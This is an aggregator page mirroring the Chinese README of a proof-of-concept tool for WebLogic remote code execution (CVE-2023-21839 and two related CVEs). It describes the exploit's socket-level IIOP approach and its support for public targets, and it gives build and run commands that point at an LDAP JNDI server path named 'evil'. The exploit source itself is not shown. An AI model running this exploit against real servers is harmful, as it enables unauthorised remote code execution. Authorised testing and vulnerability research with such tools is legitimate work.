CVE 2023 21839 Save Abandoned

Weblogic CVE-2023-21839 / CVE-2023-21931 / CVE-2023-21979 一键检测

Project README

CVE-2023-21839

未经授权许可使用本项目攻击或测试目标是非法的，本程序应仅用于授权的安全测试与研究目的

介绍

这是来自长亭xray的代码，该漏洞扫描已集成到新版xray中

Weblogic CVE-2023-21839 / CVE-2023-21931 / CVE-2023-21979 RCE

（1）无需任何 Java 依赖，构造协议通过socket直接RCE

（2）已解决 IIOP 的 NAT 网络问题（可测试 Docker 与公网目标）

（3）在 Windows/Mac OS/Linux 以及 Weblogic 12/14 中测试通过

（4）请使用 JDK 8u191 以下启动 Weblogic 并自行搭建 JNDI Server

注意：本PoC是针对CVE-2023-21839编写的，实际上同时覆盖了CVE-2023-21931和CVE-2023-21979。因为这三个漏洞触发机制相同，且补丁方式相同，所以只要存在一个，那么其他两个也存在

使用

你可以通过 vulhub 复现：链接

Linux/Mac OS

cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Windows

cd cmd
go build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

如果发现 panic 或有其他报错，说明目标不存在漏洞（或关闭了 IIOP 功能）

本地测试：

某师傅公网测试：

免责声明

此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！

如果使用者使用该工具出现任何非法攻击等违法行为，与作者无关！

Open Source Agenda is not affiliated with "CVE 2023 21839" Project. README Source: 4ra1n/CVE-2023-21839

Stars

606

Open Issues

Last Commit

1 year ago

Open Source Agenda Badge

<a href="https://www.opensourceagenda.com/projects/cve-2023-21839"><img src="https://www.opensourceagenda.com/projects/cve-2023-21839/reviews/badge.svg" alt="Open Source Agenda"></a>

Submit Review Review Your Favorite Project

Submit Resource Articles, Courses, Videos

Submit Article Submit a post to our blog

From the blog

Dec 11, 2022

How to Choose Which Programming Language to Learn First?

From the blog

Dec 11, 2022